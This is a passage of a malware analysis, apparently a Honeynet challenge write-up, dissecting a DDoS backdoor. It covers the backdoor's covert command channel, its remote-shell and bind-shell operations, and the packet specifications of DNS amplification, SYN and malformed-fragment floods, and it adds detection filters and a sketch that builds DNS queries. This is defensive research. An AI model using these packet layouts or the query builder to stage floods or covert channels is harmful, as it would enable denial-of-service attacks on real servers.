0x8048456: je 0x804852b
Obviously, the guts of this loop will run on all but one iteration, the
exception being when %edi = %ebx. What purpose does this have? We'll soon see!
The purpose of this loop, is to set the data buffer starting at
0xffffbb1c(%ebp). This buffer was used in the previous case section (and
also in case section 3) as the destination IP(s) to pass to
Network_Function_A. In effect, this case section has the effect of the
blackhat telling the program who to call home! Global_B also had the
effect of making Network_Function_A send 1 packet if it was 0, and 10
packets if anything else.
On all other iterations of the loop (%edi != %ebx), Global_B (set a few
lines earlier) is checked. If it is 2, it would appear that the data
from the decoded buffer is copied directly into indexed positions
starting at 0xffffbb1c(%ebp). If Global_B is anything else, the data
placed into indexed positions from 0xffffbb1c(%ebp) is randomly
generated.
What happens on that one iteration where %edi == %ebx?
If Global_B is 0, the first 4 bytes starting at 0xffffbb1c(%ebp) are set
to the first 4 bytes from 0xfffff003(%ebp). Since only one packet is
sent by Network_Function_A when Global_B is 0, this is the destination
(and most probably the place that the blackhat's client is running on)
If Global_B is 2, 9 of the 10 iterations would have copied data from
the decoded buffer (effectively allowing the blackhat to set all of
these IPs). What happens on the 10th IP (the one where %edi == %ebx)
is a mystery. It appears to be left to whatever it may have been earlier
(This could be a programming flaw on behalf of the blackhat! - Could even
lead to working out their client machine's IP).
If Global_B is anything else, the missing iteration is filled in with
the first four bytes from 0xfffff003(%ebp).
This ends this case section. The reasoning behind such a complex system
of multiple destinations for packets is obviously one of obfuscation. It
most certainly makes things extremely tough to 'prove' just who an
attacker is (notice the word prove).
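The behaviour of this case section, as understood so far, can be summarised in a short model. Everything here is a sketch built from the description above: the function and argument names are invented, the random octets are produced with Python's own generator, and the assumption that mode 2 reads entry i from the i-th group of 4 bytes has not been confirmed.

```python
import random

def build_destinations(global_b, real_ip, supplied, previous, rng=random):
    """Model the 10-entry list at 0xffffbb1c(%ebp).

    global_b -- mode byte (third byte of the decoded buffer)
    real_ip  -- the 4 bytes at 0xfffff003(%ebp)
    supplied -- ten 4-byte entries from the decoded buffer (used in mode 2)
    previous -- list contents before this call (what mode 2 leaves behind)
    """
    dests = list(previous)
    skip = rng.randrange(10)              # random() MOD 0xa, kept in %edi
    for i in range(10):
        if i != skip:
            if global_b == 2:
                dests[i] = supplied[i]
            else:
                dests[i] = bytes(rng.randrange(256) for _ in range(4))
        elif global_b == 0:
            dests[0] = real_ip            # always written to the first entry
        elif global_b != 2:
            dests[i] = real_ip            # hidden among the random entries
        # global_b == 2: entry `skip` is left as it was
    return dests, skip
```

In mode 0 only the first entry matters, since only one packet is sent. In mode 2 the model makes the possible flaw visible: one entry keeps whatever value it held before.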
Network_Analysis_A - Incoming covert communications channel.
About: This binary listens for packets matching a particular description.
Upon receiving certain packets, it will do certain actions. This
section will attempt to add some structure to be able to work out
what is occurring from network traffic.
Packet structure:
IP level:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     DDOS 1    |     DDOS 2    |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
|                                                               |
+                      COVERT DATA BUFFER                       +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields (Necessary):
Total Length: Must be greater than 200 (well, recv() has to get more than
200 bytes, so theoretically this means the total length on
a non-corrupt packet would be > 200).
Protocol: Must be 11.
Destination Address:
This doesn't necessarily have to be anything, but it is
used as the source IP address for any outgoing covert
communications (see Network_Analysis_B)
DDOS1: This must be a 2.
DDOS2: This byte doesn't seem to be used or checked.
COVERT DATA BUFFER:
This is filled with an encoded buffer that is decoded by
Data_Manipulation_Function_A.
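The necessary fields above translate into a simple test that could be applied to captured traffic. The sketch below is an assumption-laden illustration: the function name is invented, the packet is expected as raw bytes starting at the IP header, and the DDOS1 byte is looked for at a fixed offset of 20 (a 20 byte IP header, as drawn above).

```python
def is_covert_command(packet):
    """Apply the three checks described above to a raw IPv4 packet (bytes)."""
    if len(packet) <= 200:        # recv() has to return more than 200 bytes
        return False
    if packet[9] != 11:           # IP protocol field must be 11
        return False
    return packet[20] == 2        # DDOS1, first byte after the IP header
```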
Covert Data Buffer decoded:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|    Unknown    |   Operation   |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+          DATA BUFFER          +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
This structure represents a DECODED representation of the covert data
buffer.
The data is analysed and the Operation field used to control various
actions:
Operation Field:
1: Generates a covert channel response to the blackhat which contains
the status of the binary. It could also be a covert packetting tool
but is extremely unlikely :)
2: An interesting feature of this binary is the covert packet channel.
The binary can generate a single packet to the attacker, or 10
duplicate packets to the attacker which are sent to different
destination IPs.
This operation mode tells the binary to choose between the 1 and 10,
and also has the ability to set the various destination IPs.
It should be noted that the binary has no 'preset' blackhat address.
It can only find it out through this operation.
The modes of operation are determined by the first byte of DATA
BUFFER:
0: The next four bytes will be used as the octets of the single
destination IP for covert packets.
1: The next four bytes will be used as the octets, but will be
placed in a list with 9 other randomly generated IPs. The
position of these octets in this list appears random. 10
packets will be sent for every covert packet generated, one
to each IP.
2: IP octets are read directly from the next 40 bytes. Due to
the complexity of this code, it is unclear if a potential
error is in the code whereby one of the IP's will be skipped.
(Or this has some reason that has been overlooked?)
3: Another innovative feature, a covert 'shell' almost. /bin/csh is
called to execute a command that starts at DATA BUFFER. The output
of this is then sent back via the covert channel.
4: Calls Network_Function_B (DNS Amplification Attack)
5: Calls Network_Function_C (Corrupt packet flood)
6: Creates a password guarded bind shell.
7: Executes a command in the same manner as operation 3, except the
output is not sent back.
8: Appears to have the ability to stop any running 'packetting'
function, as well as the shell in operation 6.
9: Calls Network_Function_B (DNS Amplification Attack)
The difference between this and the earlier operation is that this
one looks to be able to adjust the speed.
10: Calls Network_Function_D (SYN packet flood)
11: Calls Network_Function_D (SYN packet flood)
The difference to the last operation appears to once again be that
this one has an adjustable speed.
12: Calls Network_Function_E (DNS request flood)
Many of these operation fields have their own format for the rest of the
DATA BUFFER. The relevant function analysis, combined with the case
sections can be used as a reference to see what the rest of the buffer
does.
Overview:
This covert communications channel has one main feature of being
undetected by many popular network monitoring utilities that only listen
on known protocols.
Communication takes place over an unconnected (and therefore spoofable)
protocol. This allows an attacker to VERY anonymously (and very quickly)
control many infected machines.
Network_Analysis_B - Outgoing covert communications channel.
About: There exists the ability to send data to the blackhat via an encoded
and covert network channel. The use of this channel seems to be
limited to seeing the 'status' of the binary, or being able to see
the output of executed commands.
Packet structure:
IP level:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     DDOS 1    |     DDOS 2    |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
|                                                               |
+                      COVERT DATA BUFFER                       +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: random between 422 and 622 bytes
ID: random
Flags / Fragment Offset:
0
TTL: 250 (start)
Protocol: 11
Checksum: Believed to be correct (but unchecked)
Source Address: infected machine
Destination Address:
Up to 10 addresses that can be random, or manually
set by the blackhat. The blackhat would most
probably (but by no means has to) be running a
client for this backdoor on one of these addresses.
DDOS1: 3
DDOS2: Unknown
COVERT DATA BUFFER :
Contains encoded data, as encoded by
Data_Manipulation_Function_B.
Overview:
The main feature of this channel is its ability to send 'decoy' packets
along with one to a real client. Decoy packets have often been used for
scanning networks, it now looks like they are being used in DDOS utils and
backdoors too.
Network_Analysis_C - DNS amplification attack
About: The DNS system looks to be abused by Network_Function_B. A stream of
UDP packets has been identified being sent to the DNS port of over 11
thousand IPs which are hardcoded into the binary. This has not been
proven to be an amplification attack as yet, but there is little
doubt that it will be.
Packet structure:
IP level:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        UDP Source Port        |      UDP Destination Port     |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           UDP length          |          UDP Checksum         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|             DNS ID            |Q| OPCDE |A|T|R|A|  Z  | RCODE |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            QDCOUNT            |            ANCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            NSCOUNT            |            ARCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        DNS QUERY DATA                         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: Between 48 and 53 bytes (depending on data)
ID: random 0-254
Flags / Fragment Offset:
0
TTL: Random 120 to 250
Protocol: 17 (UDP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Primary victim of attack
Destination Address:
One of 11441 IP's (See Appendix A)
These IP's are cycled through.
UDP Source Port: Manually set by blackhat, or random 0-30000
UDP Dest Port: 53 (DNS)
UDP Length: 28 to 33 (depending on data)
UDP Checksum: 0
DNS ID: Random
Q(Query/Resp): 0 (Query)
OPCODE: 0 (Standard Query)
A(Authoritative): 0
T(Truncated): 0
R(Recursion D): 1
A(Recursion A): 0
Z: 0
RCODE: 0
QDCOUNT: 1 (1 Question)
ANCOUNT: 0
NSCOUNT: 0
ARCOUNT: 0
DNS QUERY DATA: A loop is present in the code that cycles through the
following QUERY data:
"0x03 0x63 0x6F 0x6D 0x00 0x00 0x06 0x00 0x01"
QNAME: ".com" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x6E 0x65 0x74 0x00 0x00 0x06 0x00 0x01"
QNAME: ".net" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x64 0x65 0x00 0x00 0x06 0x00 0x01"
QNAME: ".de" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
QNAME: ".edu" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x6F 0x72 0x67 0x00 0x00 0x06 0x00 0x01"
QNAME: ".org" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x75 0x73 0x63 0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
QNAME: ".usc.edu"| QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x65 0x73 0x00 0x00 0x06 0x00 0x01"
QNAME: ".es" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x67 0x72 0x00 0x00 0x06 0x00 0x01"
QNAME: ".gr" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x69 0x65 0x00 0x00 0x06 0x00 0x01"
QNAME: ".ie" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
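For comparison with the bytes above, a DNS query of this shape can be generated with the standard encoding (length-prefixed labels, a zero root label, then QTYPE and QCLASS). This is a sketch with invented function names, not the binary's own routine, and it is only checked against the three-letter names and ".usc.edu".

```python
import struct

def encode_question(name, qtype=6, qclass=1):
    """Encode a DNS question: length-prefixed labels, root, type, class."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00" + struct.pack("!HH", qtype, qclass)

def build_query(query_id, name):
    """12-byte DNS header with only RD set and QDCOUNT = 1, plus one question."""
    flags = 0x0100                # QR=0, OPCODE=0, AA=0, TC=0, RD=1, RA=0
    header = struct.pack("!HHHHHH", query_id, flags, 1, 0, 0, 0)
    return header + encode_question(name)
```

Adding the 8 byte UDP header to the output of build_query() gives the UDP lengths listed above, up to 33 for ".usc.edu". Note that the standard encoding produces a length byte of 0x02 for two-letter names, whereas the listing above shows 0x03 for them; this sketch does not attempt to explain that difference.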
Overview:
This function obviously creates DNS requests, and throws them off to a list
of 11441 IP's. In looking at the hostnames, it becomes quite apparent that
many of these are DNS servers. In investigating 20 of these servers
randomly, 17 gave valid responses to questions, 2 refused any query, and 1
was unreachable. This would suggest the list isn't new, or that the people
in charge of these servers have noticed attacks and have acted to block
them.
The attack is most certainly a form of bandwidth amplification attack. A
request (as seen above) is on average 41 bytes. In sniffing responses to
the above queries (generated by host -t ns QNAME), responses are roughly
500 bytes long. This means roughly 12x amplification is achieved.
Unfortunately, DNS traffic is quite difficult to filter and still maintain
normal operations, making this a difficult attack to defend against.
One thing that does stand out, is that the UDP checksum is 0. It is
unclear as to if this will remain 0 when the packet is sent out.
Network_Analysis_D - UDP / ICMP corrupt packet flood attack
About: The purpose behind the packets sent out by Network_Function_C is
unknown. The contents of these packets appear to be IP fragments
that have less data to them than the header indicates.
Packet structure:
IP level:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: 10268
ID: 1109
Flags / Fragment Offset:
Offset = 8190 (flags = 0)
TTL: Random 120 to 250
Protocol: 1(ICMP) / 17 (UDP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Can be set to a single IP, or randomised
Destination Address:
This is the primary victim of the attack.
The traffic generated by Network_Function_C can take one of two forms:
ICMP, or UDP. This is decided by the blackhat, and is not a mix.
The following are the relative 2nd layer headers:
ICMP:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Internet Header + 64 bits of Original Data Datagram      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: 8 (ICMP_ECHO)
Code: 0
Checksum: Believed to be correct (But unchecked)
UDP:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        UDP Source Port        |      UDP Destination Port     |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           UDP length          |          UDP Checksum         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      DATA     |
+-+-+-+-+-+-+-+-+
UDP Source Port: Always random 0-254.
UDP Destination Port: Always set by the blackhat to a single port.
UDP Length: 9 (indicating 1 byte of data)
UDP Checksum: Believed to be correct (But unchecked)
Overview:
This traffic seems corrupt. This may be deliberate, an attempt to
elicit error conditions, or perhaps it has some other sneaky purpose?
Run-time testing will be needed to try to understand the purpose behind
these packets.
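One piece of arithmetic on the IP-level fields listed above may help with that testing. RFC 791 counts the fragment offset in units of 8 bytes, so if the 8190 above is the raw field value (an assumption, it has not been confirmed against a capture), the span of data this fragment claims to cover works out as follows. The function name is invented for the example.

```python
def fragment_span(total_length, frag_offset_field, ihl_words=5):
    """Return (first_byte, end_byte) of the payload this fragment claims to carry.

    frag_offset_field is taken to be the raw 13-bit field, counted in
    8-byte units as defined by RFC 791.
    """
    start = frag_offset_field * 8
    payload = total_length - ihl_words * 4
    return start, start + payload

start, end = fragment_span(10268, 8190)
# A reassembled datagram (20-byte header plus data) cannot exceed 65535 bytes.
exceeds_max = end + 20 > 65535
```

Under that assumption the fragment would start at byte 65520 and claim data well past the 65535 byte limit of an IP datagram, which may be part of why the traffic looks corrupt.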
Network_Analysis_E - SYN flood attack
About: An implementation of a SYN flooder, undoubtedly with the same purpose
that many SYN flooders have been written in the past.
Packet structure:
IP level:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Source Port          |       Destination Port        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        Sequence Number                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Acknowledgment Number                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Data |           |U|A|P|R|S|F|                               |
| Offset| Reserved  |R|C|S|S|Y|I|            Window             |
|       |           |G|K|H|T|N|N|                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Checksum            |         Urgent Pointer        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: 40
ID: random 0-254
Flags / Fragment Offset:
0
TTL: Random 125 to 240
Protocol: 6 (TCP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Can be set to a single IP, or randomised
Destination Address:
Primary victim of attack
TCP Source Port: Randomised between 1 and 40000
TCP Dest Port: Set by attacker to a single port
Seq Number: Random 1 to 40000000
Ack Number: 0
Data Offset: 5 (20 byte tcp header)
Flags: SYN
Window: Random 200 to 1600
TCP Checksum: Calculated off pseudo header (unchecked if correct)
Urgent Pointer: 0
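The field values above can be turned into a crude filter for spotting this traffic in a capture. The following is a sketch only, with several assumptions: the packet is a raw IPv4 packet starting at the IP header, all multi-byte fields are read in network byte order as they appear on the wire, and the ranges listed above are inclusive. If the binary writes some fields without converting to network order, the comparisons for those fields would need byte-swapping. The function names are made up for illustration. Addresses, the destination port and checksums are not examined.

```c
#include <stddef.h>
#include <stdint.h>

/* Read big-endian (network order) 16-bit and 32-bit values. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Returns 1 if pkt matches the SYN flood field profile, 0 otherwise.
 * Hypothetical helper; ranges are assumed inclusive. */
static int matches_syn_flood_profile(const uint8_t *pkt, size_t len)
{
    const uint8_t *tcp;
    uint16_t sport, window;
    uint32_t seq;

    if (len < 40) return 0;
    if (pkt[0] != 0x45) return 0;                /* Version 4, IHL 5 */
    if (pkt[1] != 0) return 0;                   /* TOS 0 */
    if (rd16(pkt + 2) != 40) return 0;           /* Total Length 40 */
    if (rd16(pkt + 4) > 254) return 0;           /* ID 0-254 */
    if (rd16(pkt + 6) != 0) return 0;            /* Flags / Fragment Offset 0 */
    if (pkt[8] < 125 || pkt[8] > 240) return 0;  /* TTL 125-240 */
    if (pkt[9] != 6) return 0;                   /* Protocol 6 (TCP) */

    tcp = pkt + 20;                              /* IHL 5 = 20 byte IP header */
    sport = rd16(tcp);
    seq = rd32(tcp + 4);
    window = rd16(tcp + 14);

    if (sport < 1 || sport > 40000) return 0;    /* Source port 1-40000 */
    if (seq < 1 || seq > 40000000u) return 0;    /* Seq 1-40000000 */
    if (rd32(tcp + 8) != 0) return 0;            /* Ack 0 */
    if ((tcp[12] >> 4) != 5) return 0;           /* Data Offset 5 */
    if ((tcp[13] & 0x3f) != 0x02) return 0;      /* SYN and no other flag */
    if (window < 200 || window > 1600) return 0; /* Window 200-1600 */
    if (rd16(tcp + 18) != 0) return 0;           /* Urgent Pointer 0 */

    return 1;
}
```

A match does not prove the packet came from this binary, since ordinary SYN packets can fall inside these ranges by chance. It is more useful for counting how much of a suspicious burst fits the profile.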
Overview:
This attack has been seen many times before: a simple SYN flooder.
Nothing particularly nasty about this one, except perhaps the
randomisation of several fields.
The destination IP can also be given as a hostname, which can be
re-resolved every X seconds (or minutes). This could simply be an ease
of use option for the blackhat, but is more likely intended for prolonged
attacks with no interaction from the blackhat.
Network_Analysis_F - DNS request flood attack
About: This one is the most interesting (and perhaps the most serious)
attack in this binary. It is related to the DNS amplification
attack, except this time it would appear a single server is used to
generate the amplification. This would obviously cause a DoS
condition for that server (and a serious one at that).
Packet structure: Network_Analysis_C shows the types of packets that are
constructed in this attack. The differences, however, are:
Destination IP: This is the victim.
Source IP: This source can be set by the blackhat
to a single address, or it can be
continuously randomised.
UDP Checksum: Always 0.
UDP Source Port: Can be set by blackhat, or can be
random.
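Of the differences listed, the zero UDP checksum is the easiest to test for in a capture. In IPv4 a UDP checksum of 0 means that no checksum was computed, which is legal but stands out when every request in a burst carries it. The following is a small sketch for flagging such datagrams. The function name is made up, and the destination port is left as a parameter; passing 53 is an assumption based on this being a DNS request flood, not a value read from the binary.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if the 8-byte UDP header at udp (network byte order) is
 * addressed to dport and carries a zero checksum, 0 otherwise.
 * Hypothetical helper for sifting a capture. */
static int udp_zero_checksum_to_port(const uint8_t *udp, size_t len,
                                     uint16_t dport)
{
    if (len < 8)
        return 0;                        /* too short for a UDP header */
    if ((uint16_t)((udp[2] << 8) | udp[3]) != dport)
        return 0;                        /* destination port mismatch */
    return udp[6] == 0 && udp[7] == 0;   /* checksum field is zero */
}
```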
Overview:
This traffic is perhaps the most important attack to analyse from the
whole binary, primarily because enough infected machines could cause a
DoS against pretty much any public nameserver on the Internet.
Any public nameserver of course includes the gtld and root servers. Coupled
with the ability to specify hostnames which are periodically resolved,
this attack IS something to be worried about.
It is of course nothing new. A DDOS form of this attack has been expected
for a long time, as has an attack on the DNS system itself.
Hopefully the blackhat(s) involved with this DDOS have not compromised
enough machines to carry out a large attack, or do not have a desire to
do it. (How long till we see a better protected DNS system put into
place? - This IS important.)
Appendix A - DNS Servers as used by Network_Function_B
The following servers are embedded within the binary for use as traffic
amplifiers. The list starts at 0x806d22c, which is four bytes after the
start of the .data section. Accordingly, the file offset of the list is
0x2422c bytes. In hexdump output each address appears in little endian
word ordering.
For instance:
000c 0282 = 0c.00.82.02 = 12.0.130.2
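The swap in the example above can be done mechanically. hexdump prints each pair of file bytes as one 16-bit little endian word, so the low byte of each printed word is the byte that comes first in the file. The following is a minimal sketch of the conversion; the function name words_to_ip is made up for illustration and this is not the supplied dnsrip.c.

```c
#include <stdint.h>
#include <stdio.h>

/* Convert two 16-bit words, as printed by hexdump on a little endian
 * machine, into a dotted-quad string. The low byte of each word is the
 * first byte in the file. Illustrative helper, not part of dnsrip.c. */
static void words_to_ip(uint16_t w0, uint16_t w1, char *out, size_t outlen)
{
    snprintf(out, outlen, "%u.%u.%u.%u",
             (unsigned)(w0 & 0xff), (unsigned)(w0 >> 8),
             (unsigned)(w1 & 0xff), (unsigned)(w1 >> 8));
}
```

Calling words_to_ip(0x000c, 0x0282, buf, sizeof buf) with a 16 byte buffer fills buf with "12.0.130.2", matching the example.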
A file (dnsrip.c) has been provided that works with the HoneyNet supplied
binary ONLY.
exploit-dev:/reverse# ./dnsrip the-binary | wc -l
11441
A simple shell script can be used to resolve each of these IPs. Due to the
size of the list (11441 servers!) the output is not included here, but can be
found in DNS_Amplification_Servers.